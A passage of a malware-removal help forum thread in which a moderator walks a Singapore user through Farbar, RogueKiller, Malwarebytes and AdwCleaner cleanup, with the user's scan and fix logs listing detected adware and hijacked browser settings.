    2017-03-11 01:43 - 2013-08-22 05:36 - 00000000 ____D C:\Windows\Inf
    2017-03-11 01:41 - 2016-08-23 00:02 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2017-03-11 01:13 - 2017-01-10 04:24 - 00000000 ____D C:\Users\Public\Documents\.forever
    2017-03-09 05:43 - 2016-08-19 03:06 - 00000000 ____D C:\Users\User\AppData\Roaming\WhatsApp
    2017-03-08 17:36 - 2015-11-08 08:30 - 00000000 ____D C:\Users\User\AppData\Local\Dropbox
    2017-03-07 19:06 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\System32\NDF
    2017-03-07 05:05 - 2016-09-07 06:47 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-03-07 00:17 - 2017-01-11 19:10 - 00000000 ____D C:\Users\User\AppData\Local\SolidWorks
    2017-03-07 00:17 - 2017-01-10 05:58 - 00000000 ____D C:\ProgramData\SOLIDWORKS
    2017-03-05 18:14 - 2016-08-18 07:06 - 00000000 ____D C:\ProgramData\Autodesk
    2017-03-05 18:10 - 2016-08-18 07:05 - 00000000 ____D C:\Users\User\AppData\Roaming\Autodesk
    2017-03-05 18:09 - 2017-01-10 01:59 - 00000000 ____D C:\Program Files (x86)\Autodesk
    2017-03-05 18:08 - 2017-01-10 04:03 - 00000000 ____D C:\Users\Public\Documents\Autodesk
    2017-03-05 18:08 - 2016-08-18 05:34 - 00000000 ____D C:\Users\User\AppData\Local\Autodesk
    2017-03-05 17:48 - 2017-01-10 01:54 - 00000000 ____D C:\Program Files\Common Files\Autodesk Shared
    2017-03-05 17:44 - 2017-01-10 04:03 - 00000000 ____D C:\Program Files\Autodesk
    2017-03-05 04:13 - 2017-01-10 00:19 - 00000000 ____D C:\Autodesk
    2017-03-02 21:44 - 2016-03-07 00:43 - 00000000 ____D C:\ProgramData\CanonIJPLM
    2017-03-02 04:36 - 2017-01-11 19:16 - 00000000 ____D C:\ProgramData\DassaultSystemes
    2017-03-01 02:22 - 2016-08-19 03:06 - 00002174 _____ C:\Users\User\Desktop\WhatsApp.lnk
    2017-03-01 02:22 - 2016-08-19 03:05 - 00000000 ____D C:\Users\User\AppData\Local\SquirrelTemp
    2017-02-28 04:51 - 2016-12-14 18:01 - 00003162 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task v2
    2017-02-28 04:51 - 2016-08-23 00:24 - 00003170 _____ C:\Windows\System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-3023424667-1579791547-2771295078-1001
    2017-02-26 23:20 - 2017-01-23 16:40 - 00000000 ___HD C:\Users\Public\Documents\.adata
    2017-02-26 23:20 - 2017-01-23 16:39 - 00000000 ____D C:\ProgramData\SofTest
    2017-02-22 23:45 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
    2017-02-22 23:45 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\AppReadiness
    2017-02-22 23:29 - 2014-12-03 08:56 - 00000000 ____D C:\ProgramData\Skype
    2017-02-21 21:25 - 2016-11-01 00:40 - 00000000 ____D C:\Program Files (x86)\WinArcher
    2017-02-21 08:39 - 2016-08-14 19:37 - 00000000 ____D C:\Program Files (x86)\Tafleclwther
    2017-02-21 08:12 - 2016-10-27 03:02 - 00000000 ___RD C:\Program Files (x86)\Skype
    2017-02-21 08:04 - 2016-10-25 06:34 - 00000000 ____D C:\ProgramData\WinSAPSvc
    2017-02-20 00:18 - 2017-02-09 05:27 - 00000000 ____D C:\Program Files (x86)\WinSnare(4.1.0)
    2017-02-15 23:22 - 2015-07-12 12:34 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
    2017-02-13 07:11 - 2017-01-17 05:49 - 00003638 _____ C:\Windows\System32\Tasks\WinTOOL
    2017-02-13 07:11 - 2017-01-17 05:49 - 00000000 ____D C:\ProgramData\wintools

    Files to move or delete:
    ====================
    C:\ProgramData\RefreshReg.vbs
    C:\ProgramData\Google Chrome.lnk.bat
    C:\ProgramData\Mozilla Firefox.lnk.bat


    ==================== Known DLLs (Whitelisted) =========================


    ==================== Bamital & volsnap ======================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\System32\winlogon.exe => MD5 is legit
    C:\Windows\System32\wininit.exe => MD5 is legit
    C:\Windows\explorer.exe
    [2015-07-14 10:18] - [2015-01-27 15:47] - 2501368 ____A (Microsoft Corporation) C10A66189DC8C090E7C84873EDCEBC88

    C:\Windows\SysWOW64\explorer.exe
    [2015-07-14 10:18] - [2015-01-27 15:41] - 2207488 ____A (Microsoft Corporation) 91E24273FCA076EA9E65DAFA98901225

    C:\Windows\System32\svchost.exe => MD5 is legit
    C:\Windows\SysWOW64\svchost.exe => MD5 is legit
    C:\Windows\System32\services.exe
    [2015-07-13 15:44] - [2015-04-08 14:55] - 0410128 ____A (Microsoft Corporation) E0C7813A97CA7947FF5C18A8F3B61A45

    C:\Windows\System32\User32.dll => MD5 is legit
    C:\Windows\SysWOW64\User32.dll => MD5 is legit
    C:\Windows\System32\userinit.exe => MD5 is legit
    C:\Windows\SysWOW64\userinit.exe => MD5 is legit
    C:\Windows\System32\rpcss.dll => MD5 is legit
    C:\Windows\System32\dnsapi.dll => MD5 is legit
    C:\Windows\SysWOW64\dnsapi.dll
    [2015-07-13 21:22] - [2014-10-28 17:06] - 0498688 ____A (Microsoft Corporation) BD9C7A068C46053F8747CEA73B5930AB

    C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

    ==================== Association (Whitelisted) =============


    ==================== Restore Points =========================

    Restore point date: 2017-03-05 05:12
    Restore point date: 2017-03-05 17:31
    Restore point date: 2017-03-13 19:40

    ==================== Memory info ===========================

    Percentage of memory in use: 20%
    Total physical RAM: 3979.43 MB
    Available physical RAM: 3178.79 MB
    Total Virtual: 3979.43 MB
    Available Virtual: 3202.24 MB

    ==================== Drives ================================

    Drive c: (OS) (Fixed) (Total:186.3 GB) (Free:67.27 GB) NTFS ==>[system with boot components (obtained from drive)]
    Drive d: (Data) (Fixed) (Total:263.35 GB) (Free:199.93 GB) NTFS
    Drive e: (flash it) (Removable) (Total:0.04 GB) (Free:0.04 GB) FAT
    Drive f: () (Removable) (Total:3.71 GB) (Free:3.7 GB) FAT32
    Drive g: (Recovery) (Fixed) (Total:0.88 GB) (Free:0.55 GB) NTFS ==>[system with boot components (obtained from drive)]
    Drive x: (Boot) (Fixed) (Total:0.5 GB) (Free:0.5 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 465.8 GB) (Disk ID: A60BBD6E)

    Partition: GPT.

    ========================================================
    Disk: 1 (Size: 38 MB) (Disk ID: 00000000)

    Partition: GPT.

    ========================================================
    Disk: 2 (Size: 3.7 GB) (Disk ID: 2C6B7369)
    No partition Table on disk 2.

    LastRegBack: 2017-03-11 20:20

    ==================== End of FRST.txt ============================
     
  8. 2017/03/13
    broni

    broni Moderator Malware Analyst

    Joined:
    2002/08/01
    Messages:
    21,483
    Likes Received:
    103
    Trophy Points:
    843
    Location:
    Daly City, CA
    Computer Experience:
    Experienced
    Download attached fixlist.txt file and save it to the very same USB flash drive you've been using. Plug the drive back in.

    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

    On Vista or Windows 7/8/10: Now please enter System Recovery Options.
    On Windows XP: Now please boot into the OTLPE CD.
    Run FRST(FRST64) and press the Fix button just once and wait.
    The tool will make a log on the flashdrive (Fixlog.txt) please post it to your reply.

    Reboot normally
     

    Attached Files:

  9. 2017/03/13
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    Fix result of Farbar Recovery Scan Tool (x64) Version: 13-03-2017
    Ran by SYSTEM (14-03-2017 12:36:09) Run:1
    Running from G:\
    Boot Mode: Recovery
    ==============================================

    fixlist content:
    *****************
    GroupPolicy: Restriction <======= ATTENTION
    S3 iThemes5; C:\Program Files (x86)\Common Files\Services\iThemes.dll [567808 2016-12-09] () <==== ATTENTION
    C:\Program Files (x86)\Common Files\Services\iThemes.dll
    S2 Themes; C:\Windows\system32\themeservice.dll [59392 2014-10-28] (Microsoft Corporation) [DependOnService: iThemes5]<==== ATTENTION
    C:\Windows\system32\themeservice.dll
    S2 WinSnare; C:\Users\User\AppData\Roaming\WinSnare\WinSnare.dll [776704 2017-03-12] (InterSect Alliance Pty Ltd) <==== ATTENTION
    S2 winzipersvc; C:\Program Files (x86)\WinZipper\winzipersvc.exe [1254960 2016-08-29] (ExWzp Pvt Ltd.) <==== ATTENTION
    S2 ed2kidle; "C:\Program Files (x86)\amuleC\ed2k.exe" -downloadwhenidle [X] <==== ATTENTION
    C:\Users\User\AppData\Roaming\WinSnare\WinSnare.dll
    S2 winzipersvc; C:\Program Files (x86)\WinZipper\winzipersvc.exe
    S3 aswHdsKe; \??\C:\Windows\system32\drivers\aswHdsKe.sys [X]
    S3 dbx; system32\DRIVERS\dbx.sys [X]
    S0 msahci; system32\drivers\msahci.sys [X]
    C:\ProgramData\RefreshReg.vbs
    C:\ProgramData\Google Chrome.lnk.bat
    C:\ProgramData\Mozilla Firefox.lnk.bat


    *****************

    C:\Windows\System32\GroupPolicy\Machine => moved successfully
    C:\Windows\System32\GroupPolicy\GPT.ini => moved successfully
    C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
    HKLM\System\ControlSet001\Services\iThemes5 => key removed successfully
    iThemes5 => service removed successfully
    HKLM\System\ControlSet001\Services\Themes\\DependOnService => value removed successfully
    C:\Program Files (x86)\Common Files\Services\iThemes.dll => moved successfully
    HKLM\System\ControlSet001\Services\Themes\\DependOnService => value not found.
    C:\Windows\system32\themeservice.dll => moved successfully
    HKLM\System\ControlSet001\Services\WinSnare => key removed successfully
    WinSnare => service removed successfully
    HKLM\System\ControlSet001\Services\winzipersvc => key removed successfully
    winzipersvc => service removed successfully
    HKLM\System\ControlSet001\Services\ed2kidle => key removed successfully
    ed2kidle => service removed successfully
    C:\Users\User\AppData\Roaming\WinSnare\WinSnare.dll => moved successfully
    winzipersvc => service not found.
    HKLM\System\ControlSet001\Services\aswHdsKe => key removed successfully
    aswHdsKe => service removed successfully
    HKLM\System\ControlSet001\Services\dbx => key removed successfully
    dbx => service removed successfully
    HKLM\System\ControlSet001\Services\msahci => key removed successfully
    msahci => service removed successfully
    C:\ProgramData\RefreshReg.vbs => moved successfully
    C:\ProgramData\Google Chrome.lnk.bat => moved successfully
    C:\ProgramData\Mozilla Firefox.lnk.bat => moved successfully

    ==== End of Fixlog 12:36:10 ====
     
  10. 2017/03/13
    broni

    broni Moderator Malware Analyst

    Joined:
    2002/08/01
    Messages:
    21,483
    Likes Received:
    103
    Trophy Points:
    843
    Location:
    Daly City, CA
    Computer Experience:
    Experienced
    [​IMG] Download RogueKiller from one of the following links and save it to your Desktop:

    Link 1
    Link 2
    • Close all the running programs
    • Double click on downloaded setup.exe file to install the program.
    • Click on Start Scan button.
    • Click on another Start Scan button.
    • Wait until the Status box shows Scan Finished
    • Click on Delete.
    • Wait until the Status box shows Deleting Finished.
    • Click on Report and copy/paste the content of the Notepad into your next reply.
    • RKreport.txt could also be found on your desktop.
    • If more than one log is produced post all logs.
    [​IMG] Please download Malwarebytes to your desktop.
    • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
    • Then click Finish.
    • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
    • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
    • When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
    • Restart your computer when prompted to do so.
    • The Scan log is available throughout History ->Application logs. Please post it contents in your next reply.
    [​IMG] Please download AdwCleaner by Xplode and save to your Desktop.
    • Double click on AdwCleaner.exe to run the tool.
      Vista/Windows 7/8 users right-click and select Run As Administrator
    • The tool will start to update the database if one is required.
    • Click on the Scan button.
    • AdwCleaner will begin...be patient as the scan may take some time to complete.
    • After the scan has finished, click on the Logfile button.
    • A window will open which lists the logs of your scans.
    • Click on the Scan tab.
    • Double-click the most recent scan which will be at the top of the list....the log will appear.
    • Review the results...see note below
    • After reviewing the log, click on the Clean button.
    • Press OK when asked to close all programs and follow the onscreen prompts.
    • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
    • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
    • To open a Cleaning log, launch AdwareClearer, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
    • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
    • A copy of all logfiles are saved to C:\AdwCleaner.
    -- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.


    [​IMG] Please download Junkware Removal Tool to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.
     
  11. 2017/03/14
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    RogueKiller V12.10.0.0 (x64) [Mar 13 2017] (Free) by Adlice Software
    mail : Contact - Adlice Software
    Feedback : Adlice forum - Home
    Website : RogueKiller Anti-Malware Free Download - Official Website
    Blog : Adlice Software

    Operating System : Windows 8.1 (6.3.9600) 64 bits version
    Started in : Normal mode
    User : User [Administrator]
    Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
    Mode : Scan -- Date : 03/15/2017 10:43:21 (Duration : 01:50:03)

    ¤¤¤ Processes : 18 ¤¤¤
    [PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] iSafeSvc.exe(300) -- C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe[7] -> Found
    [PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] iSafeSvc2.exe(672) -- C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe[7] -> Found
    [Adw.FakeBro|VT.Adware.Elex] iedvutils.exe(1764) -- C:\Program Files (x86)\Explorer\iedvutils.exe[7] -> Found
    [PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] iSafeTray.exe(2660) -- C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe[7] -> Found
    [Adw.Elex] svchost.exe(3988) -- C:\Windows\SysWOW64\svchost.exe[7] -> Found
    [Adw.Elex] svchost.exe(4036) -- C:\Windows\SysWOW64\svchost.exe[7] -> Found
    [Adw.Elex|Suspicious.Path|Tr.Eroyee|Proc.RunPE|VT.Corrupted] Kyubey.exe(2548) -- C:\Users\User\AppData\Roaming\Kyubey\Kyubey.exe[-] -> Found
    [PUP.Ghokswa|VT.Adware.Elex] FirefoxUpdate.exe(2564) -- C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe[7] -> Found
    [PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] iDskDllPatch64.dll(2220) -- C:\Program Files (x86)\Elex-tech\YAC\iDskDllPatch64.dll[7] -> Found
    [PUP.Gen0|PUP.Gen1|VT.Trojan:Win32/Xadupi] wzShellctx64.dll(2220) -- C:\Program Files (x86)\WinZipper\wzShellctx64.dll[-] -> Found
    [PUP.Ghokswa|VT.Adware.Elex] (SVC) FirefoxU -- "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe"[7] -> Found
    [Adw.FakeBro|VT.Adware.Elex] (SVC) iedvutils -- C:\Program Files (x86)\Explorer\iedvutils.exe[7] -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (SVC) iSafeKrnl -- \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys[7] -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (SVC) iSafeKrnlKit -- \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys[7] -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (SVC) iSafeKrnlMon -- \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys[7] -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (SVC) iSafeKrnlR3 -- \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys[7] -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (SVC) iSafeNetFilter -- system32\DRIVERS\iSafeNetFilter.sys[7] -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (SVC) iSafeService -- C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe[7] -> Found

    ¤¤¤ Registry : 70 ¤¤¤
    [PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{6710C780-E20E-4C49-A87D-321850ED3D7C} -> Found
    [PUP.Gen0|PUP.Gen1|VT.Trojan:Win32/Xadupi] (X64) HKEY_CLASSES_ROOT\CLSID\{DC638EEA-2BA2-4459-9C46-85A2F0BE6040} (C:\Program Files (x86)\WinZipper\wzShellctx64.dll) -> Found
    [Adw.Elex] (X64) HKEY_LOCAL_MACHINE\Software\InterSect Alliance -> Found
    [PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\Software\jhdbca -> Found
    [PUP.Amisites] (X86) HKEY_LOCAL_MACHINE\Software\amisitesSoftware -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Elex-tech -> Found
    [Adw.FakeBro] (X86) HKEY_LOCAL_MACHINE\Software\Explorer -> Found
    [PUP.Ghokswa] (X86) HKEY_LOCAL_MACHINE\Software\Firefox -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\hdcode -> Found
    [PUP.Gen0] (X86) HKEY_LOCAL_MACHINE\Software\InterHop -> Found
    [PUP.Gen0] (X86) HKEY_LOCAL_MACHINE\Software\jhdbca -> Found
    [PUP.StartPageIng] (X86) HKEY_LOCAL_MACHINE\Software\startpageing123Software -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\trotuxSoftware -> Found
    [Adw.Elex] (X86) HKEY_LOCAL_MACHINE\Software\UvConverter -> Found
    [PUP.WinArcher|PUP.Gen0] (X86) HKEY_LOCAL_MACHINE\Software\WinArcher -> Found
    [PUP.Gen0] (X86) HKEY_LOCAL_MACHINE\Software\WinSaberSvc -> Found
    [PUP.Gen0] (X64) HKEY_USERS\.DEFAULT\Software\jhdbca -> Found
    [PUP.Gen0] (X86) HKEY_USERS\.DEFAULT\Software\jhdbca -> Found
    [Adw.FakeBro] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Explorer -> Found
    [PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\ICSW1.17 -> Found
    [PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\ProductSetup -> Found
    [Adw.Elex] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\WinSnare -> Found
    [Adw.FakeBro] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Explorer -> Found
    [PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\ICSW1.17 -> Found
    [PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\ProductSetup -> Found
    [Adw.Elex] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\WinSnare -> Found
    [PUP.Gen0] (X64) HKEY_USERS\S-1-5-18\Software\jhdbca -> Found
    [PUP.Gen0] (X86) HKEY_USERS\S-1-5-18\Software\jhdbca -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564 -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\iSafe -> Found
    [PUP.QRss] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{56B2B28A-E663-4D28-84A3-3846068A7D63} -> Found
    [PUP.Gen0] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ba32987d-db80-4ccb-a8bb-f812b5421c0f} -> Found
    [Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Windows\CurrentVersion\Run | AfterPlayMonitor : C:\Users\User\AppData\Roaming\Letv\AfterPlay\AfterPlayMonitor.exe [7] -> Found
    [Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Windows\CurrentVersion\Run | AfterPlayMonitor : C:\Users\User\AppData\Roaming\Letv\AfterPlay\AfterPlayMonitor.exe [7] -> Found
    [PUP.Ghokswa|VT.Adware.Elex] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\FirefoxU ("C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe") -> Found
    [Adw.FakeBro|VT.Adware.Elex] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iedvutils (C:\Program Files (x86)\Explorer\iedvutils.exe) -> Found
    [PUP.Gen0|PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeKrnl (\??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys) -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeKrnlBoot (system32\DRIVERS\iSafeKrnlBoot.sys) -> Found
    [PUP.Gen0|PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeKrnlKit (\??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys) -> Found
    [PUP.Gen0|PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeKrnlMon (\??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys) -> Found
    [PUP.Gen0|PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeKrnlR3 (\??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys) -> Found
    [PUP.Gen0|PUP.Yac|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeNetFilter (system32\DRIVERS\iSafeNetFilter.sys) -> Found
    [PUP.Gen0|PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeService (C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe) -> Found
    [PUM.Proxy] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : 127.0.0.1:8118 -> Found
    [PUM.Proxy] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : 127.0.0.1:8118 -> Found
    [PUM.HomePage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Start Page : MyLucky123 -> Found
    [PUM.HomePage] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Start Page : MyLucky123 -> Found
    [PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Start Page : MyLucky123 -> Found
    [PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Start Page : MyLucky123 -> Found
    [PUM.HomePage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : MyLucky123 -> Found
    [PUM.HomePage] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : MyLucky123 -> Found
    [PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : MyLucky123 -> Found
    [PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : MyLucky123 -> Found
    [PUM.SearchPage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Search Page : {searchTerms} - Google Search -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Search Page : {searchTerms} - Google Search -> Found
    [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Search Page : {searchTerms} - Google Search -> Found
    [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Search Page : {searchTerms} - Google Search -> Found
    [PUM.SearchPage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Default_Search_URL : http://www.mylucky123.com/search/?t...01ABF050_Z4LKC79YTXXZ4LKC79YT&q={searchTerms} -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Default_Search_URL : http://www.nuesearch.com/search/?ty...01ABF050_Z4LKC79YTXXZ4LKC79YT&q={searchTerms} -> Found
    [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Default_Search_URL : http://www.mylucky123.com/search/?t...01ABF050_Z4LKC79YTXXZ4LKC79YT&q={searchTerms} -> Found
    [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Default_Search_URL : http://www.mylucky123.com/search/?t...01ABF050_Z4LKC79YTXXZ4LKC79YT&q={searchTerms} -> Found
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 137.132.0.254 137.132.0.252 ([Singapore][Singapore]) -> Found
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{4B1A8B33-03CA-4186-B2E3-936CF07F5CEF} | DhcpNameServer : 137.132.0.254 137.132.0.252 ([Singapore][Singapore]) -> Found
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {501B833C-BFF1-45A8-849F-9EB93F30B64E} : v2.22|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\User\AppData\Local\Doyo\DYService.exe|Name=??????| [x] -> Found
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {1C45797D-99A6-4473-AC81-0B9344D30C42} : v2.22|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\User\AppData\Local\Doyo\MiniDown\download\MiniThunderPlatform.exe|Name=???????| [x] -> Found
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {3BF4294A-3D72-4D79-A690-3F9264E10BC8} : v2.22|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\Newjob\Newjob.exe|Name=Protect service| [x] -> Found
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {38AF029C-111C-40CE-8715-10F8E25BF8B0} : v2.22|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\Fishlose\Fishlose.exe|Name=Protect service| [x] -> Found
    [PUP.Ghokswa|VT.Adware.Elex] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {805079A0-1323-48C6-B317-56DE91AC91E0} : v2.22|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe|Name=Update service| [7] -> Found
    [PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Found
    [PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Found

    ¤¤¤ Tasks : 2 ¤¤¤
    [Adw.Elex|Suspicious.Path|VT.Adware.Elex] \WinTOOL -- C:\ProgramData\wintools\WintoolUprI.exe (/update) -> Found
